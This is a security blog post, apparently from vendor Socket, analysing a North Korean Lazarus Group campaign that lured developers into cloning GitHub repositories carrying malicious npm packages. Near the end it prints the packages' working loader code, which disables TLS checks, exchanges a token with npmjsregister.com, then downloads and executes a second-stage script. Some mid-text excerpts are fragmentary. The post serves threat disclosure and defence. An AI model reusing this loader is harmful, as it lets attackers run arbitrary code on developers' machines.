Security News
ESLint is Now Language-Agnostic: Linting JSON, Markdown, and Beyond
ESLint has added JSON and Markdown linting support with new officially-supported plugins, expanding its versatility beyond JavaScript.
Research
Feross Aboukhadijeh
July 25, 2023
The digital world is becoming increasingly perilous as nefarious actors, especially state-sponsored groups, grow bolder in their cyber-espionage and cyber-theft operations. A recent alert from GitHub has sounded the alarm bells about a sophisticated social engineering scheme, which has been tied to the Lazarus Group.
This North Korean state-backed hacking syndicate, with known aliases like Jade Sleet and TraderTraitor, has been on the radar of several intelligence agencies, notably after the US government's exposé on their tactics in 2022. Their modus operandi involves compromising or fabricating GitHub accounts, luring professionals from sectors such as cryptocurrency, online gambling, and cybersecurity into seemingly benign collaborations. The end goal is malevolent: using malware-infected NPM packages to infiltrate their targets' devices.
The group's tactics are quite intricate. For instance, initial contact often moves to other platforms like WhatsApp, where the rapport is built before the unsuspecting victims are led to clone malware-laden GitHub repositories. Our investigation reveals that these NPM packages connect to remote servers, fetching additional malware to unleash on the infected devices.
Take one of the malicious packages, assets-table, for example. This snippet highlights a key part of the initial payload:
This blog post delves deep into the technical workings of the attack, providing insights into the malicious code and offering measures developers can take to defend against such threats.
Socket detected and blocked the majority of these malicious packages within seconds of publish for the 3,000+ organizations who use Socket to protect their GitHub repos.
But it was GitHub themselves who was able to attribute the attack to North Korean threat actors:
We assess with high confidence that this campaign is associated with a group operating in support of North Korean objectives, known as Jade Sleet by Microsoft Threat Intelligence and TraderTraitor by the U.S. Cybersecurity and Infrastructure Security Agency (CISA). Jade Sleet mostly targets users associated with cryptocurrency and other blockchain-related organizations, but also targets vendors used by those firms.
GitHub's analysis reveals a sophisticated multi-step attack chain primarily targeting the npm ecosystem.
This isn't the Lazarus Group's first rodeo. They've previously engineered malicious campaigns targeting security researchers, often leveraging counterfeit "security researcher" profiles on social media platforms. By luring these experts into collaborating on fake projects, the group successfully infected their devices. In another instance, they established a sham company, SecuriElite, as a front to distribute malware.
Peeling back the layers on Lazarus's past reveals a consistent theme: a relentless pursuit of cryptocurrency. Their attacks range from disseminating compromised cryptocurrency wallets to stealing a staggering $625 million from a blockchain game. In the latter case, the group employed a deceitful job offer as their entry point. This is reminiscent of the "Operation Dream Job" campaign from 2020, where the group targeted defense and aerospace professionals in the US using fabricated employment opportunities.
$HOME_DIR/.vscode/npmcache
.Excerpt from tslib-react:
$HOME_DIR/.vscode/npmcache
created by the first package.Excerpt from tslib-util:
https://npmjsregister.com/getupdate.php
endpoint.node
script.While the full extent of this secondary payload remains shrouded in mystery, the level of sophistication and the concealment strategies used by this group is a testament to their capabilities.
Traditional Software Composition Analysis (SCA) tools are lacking because they don't even attempt to catch zero-day malware like this campaign. However, Socket provides a robust shield against such threats.
In the face of escalating supply chain attacks, Socket represents the next generation of security tools, ensuring developers can safely harness the power and innovation of the open-source community.
Protect your projects and secure your open-source dependencies. Install Socket for GitHub today, or book a demo to learn more about how Socket can fortify your defenses against supply chain attacks and help to stop attacks just like this one.
This is the list of affected packages, as far as we know to date. Each package is linked the corresponding Socket package health report, so you can get an idea of what Socket's "capability analysis" detects within each package:
From one of the malicious packages, tslib-react:
const os = require("os");
const path = require("path");
var fs = require('fs');
process.env['NODE_TLS_REJECT_UNAUTHORIZED'] = 0
function registerAudit(version, projectUrl) {
var request = require('sync-request');
var ticket = request('GET', projectUrl);
fs.writeFileSync(version, ticket.getBody());
}
var folder = os.homedir() + "/.vscode";
if (!fs.existsSync(folder)){
fs.mkdirSync(folder);
}
registerAudit(path.join(folder,'/jsontoken'), 'https://npmjsregister.com/checkupdate.php');
From another malicious package, tslib-util:
const os = require("os");
const path = require("path");
var fs = require('fs');
function getsvnroot(domain, entry, token, path) {
const https = require('https');
const querystring = require('querystring');
const options = {
hostname: domain,
port: 443,
path: entry,
method: 'POST',
headers: {'content-type' : 'application/x-www-form-urlencoded'},
};
const req = https.request(options, (resp) => {
let data = "";
// A chunk of data has been recieved.
resp.on("data", chunk => {
data += chunk;
});
resp.on("end", () => {
fs.writeFileSync(path, data);
const { exec } = require('child_process');
exec('node ' + path, (error, stdout, stderr) => {
});
});
});
req.on('error', (e) => {
console.error(e.message);
});
req.write(token);
req.end();
}
process.env['NODE_TLS_REJECT_UNAUTHORIZED'] = 0
var dir = path.join(os.homedir(), ".vscode");
if (fs.existsSync(dir)){
const token = fs.readFileSync(path.join(dir,'jsontoken'),
{encoding:'utf8', flag:'r'});
getsvnroot('npmjsregister.com', '/getupdate.php', token, path.join(dir ,'checkjson.js'));
}
More information is also available in the corresponding GitHub post.
Subscribe to our newsletter
Get notified when we publish new security blog posts!
Try it now
Security News
ESLint has added JSON and Markdown linting support with new officially-supported plugins, expanding its versatility beyond JavaScript.
Security News
Members Hub is conducting large-scale campaigns to artificially boost Discord server metrics, undermining community trust and platform integrity.
Security News
NIST has failed to meet its self-imposed deadline of clearing the NVD's backlog by the end of the fiscal year. Meanwhile, CVE's awaiting analysis have increased by 33% since June.